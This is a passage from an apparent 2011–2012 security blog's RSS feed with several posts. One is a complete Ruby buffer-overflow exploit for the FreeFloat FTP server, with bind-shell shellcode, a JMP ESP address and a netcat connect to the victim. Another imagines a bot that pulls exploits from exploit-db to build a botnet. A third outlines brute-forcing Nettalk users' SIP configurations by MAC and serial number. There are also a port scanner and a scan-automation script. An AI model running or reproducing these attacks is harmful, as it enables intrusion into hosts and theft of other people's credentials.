<p><strong>To sign the petition click here:</strong></p>
<p><a href="https://blacklists.eff.org/">https://blacklists.eff.org/</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F01%2Fsopablackout-stop-sopa-stop-pipa%2F&amp;title=%23SOPABlackout%20%23StopSOPA%20%23StopPIPA" id="wpa2a_18"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/01/sopablackout-stop-sopa-stop-pipa/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Daemon Reality</title>
		<link>http://www.digitaloffensive.com/2012/01/daemon-reality/</link>
		<comments>http://www.digitaloffensive.com/2012/01/daemon-reality/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 14:27:34 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=359</guid>
		<description><![CDATA[Daemon Reality Daniel Suarez wrote in his book Daemon about a man that upon his death a strategically crafted computer system that would launch a mulitude of events that range from something extremely simple to murder. In the book he mentions how there are a multitude of systems monitoring different resources for this person’s death. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Daemon Reality</strong></p>
<p>Daniel Suarez wrote in his book Daemon about a man that upon his death a strategically crafted computer system that would launch a mulitude of events that range from something extremely simple to murder. In the book he mentions how there are a multitude of systems monitoring different resources for this person’s death. What if we eliminated the need for such a vast system and used the number one social media site and a simple application. What if we stream line the process?</p>
<p>Today I stumbled upon an application for the social media giant Facebook called “If I Die” (<a href="http://www.ifidie.net/">http://www.ifidie.net</a>). This application allows you to record a message or a post that upon your death and verification of your three trustees will be posted to your Facebook account. Wow now over several million people will know I am dead before the newspapers even have the first obituary with my death printed.</p>
<p>So you are now thinking how does this line up with the book the Daemon? Well let’s go back a few months to my Facebook bot I wrote (http://www.digitaloffensive.com/2010/08/facebook-bot-fbcbot-pl/). This bot would monitor my Facebook account for key word posts then launch commands locally to carry out my wishes. So right now you are probably thinking that’s all fine and dandy if you have a system you can guarantee will be up and running all the time as well at least for a short time after your death. Well what about cloud computing? How about Amazon cloud? They offer you a free cloud system as long as you stay below a certain usage each month. From my past usage of the system they charge you at the end of the month or in increments for usage of the cloud. So even if you are dead and your bill can’t be paid it does not matter cause after your bot detects your death it can now do whatever you want, such as create a bot net.</p>
<p>So the process would be this. Upon my death (if this application still exists) my bot running on the cloud will see my post that will give it my final command. It will then check several sites like ww.exploit-db.com for new vulnerabilities. It will then use key Google Dorks from what it found on exploit-db.com to build a list of vulnerable servers and to use the code found on that site to start attacking and infecting these hosts. Right now you are wait this is illegal! What do I care I am dead! Once the infection spreads to multiple hosts it does not matter if my cloud is shut down for nonpayment as my bot net has started.</p>
<p>Now that you have an idea where I am going with this train of thought think about other things you can do? You have a life time to prepare your master piece <img src='http://www.digitaloffensive.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>

<a href='http://www.digitaloffensive.com/2012/01/daemon-reality/ifidie1/' title='ifidie1'><img width="150" height="150" src="http://www.digitaloffensive.com/wp-content/uploads/2012/01/ifidie1-150x150.png" class="attachment-thumbnail" alt="ifidie1" title="ifidie1" /></a>
<a href='http://www.digitaloffensive.com/2012/01/daemon-reality/ifidie2/' title='ifidie2'><img width="150" height="150" src="http://www.digitaloffensive.com/wp-content/uploads/2012/01/ifidie2-150x150.png" class="attachment-thumbnail" alt="ifidie2" title="ifidie2" /></a>
<a href='http://www.digitaloffensive.com/2012/01/daemon-reality/ifidie3/' title='ifidie3'><img width="150" height="150" src="http://www.digitaloffensive.com/wp-content/uploads/2012/01/ifidie3-150x150.png" class="attachment-thumbnail" alt="ifidie3" title="ifidie3" /></a>

<p>Pictures and code for fbcbot.pl &#8221; I am dead code will be posted shortly&#8221;</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F01%2Fdaemon-reality%2F&amp;title=Daemon%20Reality" id="wpa2a_20"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/01/daemon-reality/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Simple powershell script to automate Acuentix command line scans</title>
		<link>http://www.digitaloffensive.com/2011/09/simple-powershell-script-to-automate-acuentix-command-line-scans/</link>
		<comments>http://www.digitaloffensive.com/2011/09/simple-powershell-script-to-automate-acuentix-command-line-scans/#comments</comments>
		<pubDate>Fri, 23 Sep 2011 18:09:16 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=356</guid>
		<description><![CDATA[Simple powershell script to automate Acuentix command line scans: Requirements: 1. Windows vista or higher (preferably 7) 2. Powershell 2,0 3. user access control disabled 4. Acuentix installed (v7 or higher) 5. List of sites to scan Adding functionality: To add functions to the wvs_console call edit the variable $scan Code: ################################################ ## Automate Acunetix [...]]]></description>
			<content:encoded><![CDATA[<p><strong><span style="color: #000000;"><span style="font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif;">Simple powershell script to automate Acuentix command line scans</span></span>:</strong></p>
<p><strong>Requirements:</strong><br />
1. Windows vista or higher (preferably 7)<br />
2. Powershell 2,0<br />
3. user access control disabled<br />
4. Acuentix installed (v7 or higher)<br />
5. List of sites to scan</p>
<p><strong>Adding functionality:</strong></p>
<p>To add functions to the wvs_console call edit the variable $scan</p>
<p><strong>Code:</strong></p>
<blockquote><p>################################################<br />
## Automate Acunetix Console Scans<br />
## Edit $scan to add more function (profile, report type, etc)<br />
## Created by Michael LaSalvia<br />
## http://www.digitaloffensive.com for http://SecurityonLocation.com<br />
###############################################</p>
<p>Set-Location &#8220;C:\Program Files (x86)\Acunetix\Web Vulnerability Scanner 7&#8243;<br />
# Add my directory to the current PATH<br />
$x = (Get-Location).ProviderPath<br />
$env:path = &#8220;$env:path;$x&#8221;<br />
write-host &#8220;Current directory added to ENV:PATH&#8221;<br />
##################################################<br />
##Edit below but be careful<br />
##################################################</p>
<p>$sites= Get-Content c:\mytest\sites.txt<br />
foreach ($i in $sites) {<br />
$scan = &#8220;/scan $i /generatereport&#8221;<br />
Start-Process &#8216;wvs_console.exe&#8217; -WindowStyle hidden -Wait -ArgumentList $scan -PassThru</p>
<p>}<br />
exit</p></blockquote>
<p><strong>How to run:</strong></p>
<p>Place code in a file called whatever you want .ps1 and make sure to sign so you can execute it with powershell. Also make sure to edit the variable sites and variable scan to meet your requirements.</p>
<p>Any questions or concerns feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F09%2Fsimple-powershell-script-to-automate-acuentix-command-line-scans%2F&amp;title=Simple%20powershell%20script%20to%20automate%20Acuentix%20command%20line%20scans" id="wpa2a_22"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/09/simple-powershell-script-to-automate-acuentix-command-line-scans/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell</title>
		<link>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/</link>
		<comments>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/#comments</comments>
		<pubDate>Wed, 20 Jul 2011 18:53:14 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Security Advisories]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=352</guid>
		<description><![CDATA[Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell The original vulnerability was published here: http://www.exploit-db.com/exploits/17550. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Ruby exploit for FreeFloat FTP Server ACCL Buffer OverFlow and remote Shell</strong></p>
<p>The original vulnerability was published here: <a href="http://www.exploit-db.com/exploits/17550">http://www.exploit-db.com/exploits/17550</a>. The FreeFloat FTP server is a free standing executable FTP server requiring no installation on a computer system. The application itself is riddled with buffer overflows and is extremely simple to crash. Though the trick is not to make it to crash but to gain shell access, Mortis original published the working exploit in python. What we have done here is converted it into a ruby exploit. Why? Simply cause while learning ruby I took it as a challenge to test what I have learned.</p>
<p><strong>Exploiting the vulnerability</strong></p>
<p>To test the actual exploit download the vulnerable software and install it on a Windows XP SP3 machine: <code><a href="http://www.freefloat.com/software/freefloatftpserver.zip">http://www.freefloat.com/software/freefloatftpserver.zip</a>. Next on a Linux machine copy the ruby code provided and save it to a file called ftpexploit.rb and chmod it to 777. To run the exploit type in ./ftpexploit.rb and enter the victims IP. If the exploit is successful you will get a windows shell.</code></p>
<p><strong><code>The Exploit</code></strong></p>
<p>#!/usr/bin/ruby</p>
<p><span id="more-352"></span></p>
<p>#</p>
<p>#FreeLoat FTP SERVER ACCL BUFFER OVERFlow and remote shell Exploit</p>
<p>#Original Exploit by: Mortis as found on exploit-db.com</p>
<p>#Code redesigned into ruby by genxweb from digitaloffensive.com</p>
<p>###############################################################</p>
<p>###############################################################</p>
<p>require &#8216;socket&#8217;</p>
<p>puts &#8220;Enter the IP to Exploit: &#8221;</p>
<p>h0st = gets</p>
<p>victim = h0st.chomp!</p>
<p>#open listener shell on port 4444</p>
<p>sc = &#8220;\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2&#8243;</p>
<p>padding = &#8220;A&#8221;*246</p>
<p>sled = &#8220;\x90&#8243;*20</p>
<p>jmpesp = &#8220;\x13\x44\x87\x7c&#8221;</p>
<p>sploit = &#8220;#{padding}#{jmpesp}#{sled}#{sc}&#8221;</p>
<p>s = TCPsocket.new(&#8220;#{victim}&#8221;,21)</p>
<p>s.recv(1024)</p>
<p>s.puts(&#8220;USER test\r\n&#8221;)</p>
<p>s.recv(1024)</p>
<p>s.puts(&#8220;PASS test\r\n&#8221;)</p>
<p>s.recv(1024)</p>
<p>s.puts(&#8220;ACCL &#8220;+sploit+&#8221;\r\n&#8221;)</p>
<p>s.close()</p>
<p>puts &#8220;#### IF EXPLOIT IS SCUCCESSFUL SHELL WILL OPEN ####&#8221;</p>
<p>puts &#8220;###################################################&#8221;</p>
<p>system(&#8220;nc #{victim} 4444&#8243;)</p>
<p><strong>How the code works</strong></p>
<p>First we ask the hacker for the victims IP address. Once we have that we remove the trailing new line statement using the chomp command. Now that we have the victims IP we build the packet that will be sent over the socket we open.</p>
<p>The first part of the packet is the padding and sled. This gets us to the point where we can overwrite the memory with our shellcode. The jmpesp variable is the place in memory in big endian format to enter our shellcode. The shellcode is a generic shellcode to open port 4444 on the victim’s machine with a windows command line access.</p>
<p>Once the packet is built we open a connection to the victim on port 21, the standard ftp port. Once the connection is built we send the user: test and password: test. After that we then send the ACCL and exploit packet. If this is successful a shell will spawn on the victims box.</p>
<p>Finally the exploit will then use netcat (nc) to connect to the victims machine so you can interact with the victim.</p>
<p>&nbsp;</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F07%2Fruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell%2F&amp;title=Ruby%20exploit%20for%20FreeFloat%20FTP%20Server%20ACCL%20Buffer%20OverFlow%20and%20remote%20Shell" id="wpa2a_24"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/07/ruby-exploit-for-freefloat-ftp-server-accl-buffer-overflow-and-remote-shell/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Simple Ruby banner grabber and port checker</title>
		<link>http://www.digitaloffensive.com/2011/07/simple-ruby-banner-grabber-and-port-checker/</link>
		<comments>http://www.digitaloffensive.com/2011/07/simple-ruby-banner-grabber-and-port-checker/#comments</comments>
		<pubDate>Mon, 18 Jul 2011 16:44:03 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=348</guid>
		<description><![CDATA[Simple Ruby banner grabber and port checker: This is a simple script I wrote in ruby to scan ports to see if they are open and grab the banner of the service.  The script has error handling built in so it is able to continue on to the next port if the port before is [...]]]></description>
			<content:encoded><![CDATA[<p>Simple Ruby banner grabber and port checker:</p>
<p>This is a simple script I wrote in ruby to scan ports to see if they are open and grab the banner of the service.  The script has error handling built in so it is able to continue on to the next port if the port before is closed. Port banners are displayed to the screen. If you want to log them to a file just alter the print statement to redirect to a file. To change the port ranges to scan alter the line where the “for loop” is 0…65536. This script will only do tcp and not udp. The script was written for fun but when you are doing an actual audit sometimes you cannot install tools on the machines or with in the network you are auditing. This will allow you to use a piece of software that is installed on most new Linux machines.</p>
<p><span id="more-348"></span></p>
<p>#!/usr/bin/ruby<br />
#Simple Ruby Banner Graber<br />
#Created by Mike @ digitaloffensive.com<br />
#######################################</p>
<p>require &#8216;socket&#8217;<br />
puts &#8220;Enter the IP to scan: &#8221;<br />
bIps = gets<br />
puts &#8220;Now scanning #{bIps} for open ports&#8221;<br />
for sPorts in 0&#8230;65536<br />
begin<br />
bcon = TCPsocket.new(&#8220;#{bIps}&#8221;, &#8220;#{sPorts}&#8221;)<br />
bcon.puts(&#8220;get / HTTP/1.1 \n\n\n\n\n&#8221;) #http is picky<br />
bhead = bcon.recv(100)<br />
bcon.close<br />
print bhead<br />
rescue<br />
puts &#8220;#{sPorts} is not open, continuing&#8221;<br />
end<br />
end</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2011%2F07%2Fsimple-ruby-banner-grabber-and-port-checker%2F&amp;title=Simple%20Ruby%20banner%20grabber%20and%20port%20checker" id="wpa2a_26"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2011/07/simple-ruby-banner-grabber-and-port-checker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nettalk chooses not to protect Client’s data / Privacy</title>
		<link>http://www.digitaloffensive.com/2011/06/nettalk-chooses-not-to-protect-client%e2%80%99s-data-privacy/</link>
		<comments>http://www.digitaloffensive.com/2011/06/nettalk-chooses-not-to-protect-client%e2%80%99s-data-privacy/#comments</comments>
		<pubDate>Sat, 25 Jun 2011 14:37:11 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=341</guid>
		<description><![CDATA[Nettalk chooses not to protect Client’s data / Privacy A little over a year ago Nettalk came on the scene as a competitor to Magic Jack. They were not only a competitor, but a neighbor having their corporate office located extremely close to Magic Jack’s office. Their claim to fame was you did not need [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Nettalk chooses not to protect Client’s data / Privacy</strong></p>
<p>A little over a year ago Nettalk came on the scene as a competitor to Magic Jack. They were not only a competitor, but a neighbor having their corporate office located extremely close to Magic Jack’s office. Their claim to fame was you did not need to have your PC on to use their device to make calls.</p>
<p>Since day one there was a group of people that were dead set to find the coveted SIP Credentials that would allow them to bring their own device and not have to use the nettalk device. Magic Jack has successfully, for the most, part made this impossible for the users which drove more clients over to Net talk and other services.</p>
<p><span id="more-341"></span></p>
<p>Nettalk has not been so successful in blocking its users from obtaining their credentials; though until now it was only possible to obtain your own credentials.  A research from West Bengal India has discovered a way to do get everyone’s credentials and has released a tool to do it.</p>
<p>The researches name is not 100% known.  The aliases on the http://www.magicjacksupport.com forum are “vj224” and “Valavan Jabbar” is in the signature. Recently, the signature also contained the website: <a href="http://www.visva-bharati.ac.in/Rabindranath/Rabindranath.htm">http://www.visva-bharati.ac.in/Rabindranath/Rabindranath.htm</a> . It looks like the mods have edited the post as well to remove the tool and contact information. Looking at the pictures and the post: <a href="http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html">http://magicjacksupport.com/nettalk-sip-via-tftp-t10925.html</a> It is quite easy to figure out how this person did this and how to reproduce this with a few lines of code.</p>
<p>The vulnerability is mostly from negligence and poor design. The researcher more than likely used a packet sniffing tool to discover vulnerability and then attempted an exploit manually.</p>
<p>Based on the post on the  Magic Jack Support forums and the screen shots I took: An attacker can download the configuration of any Nettalk user by knowing the MAC address of the device and the last 4 digits of the device serial number;  Using a simple brute force method you can quickly pull the configurations of multiple users in matter of hours, if not minutes. To speed up the attack you can find the manufacture of the Ethernet chip in the device and see what numbers they use for the start of the MAC to define that it is theirs. This will cut down the amount of possibilities you need to guess.  You could even run the code in The Cloud like several password cracking tools use today.</p>
<p><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML /> <o:AllowPNG /> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:EnableOpenTypeKerning /> <w:DontFlipMirrorIndents /> <w:OverrideTableStyleHps /> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> 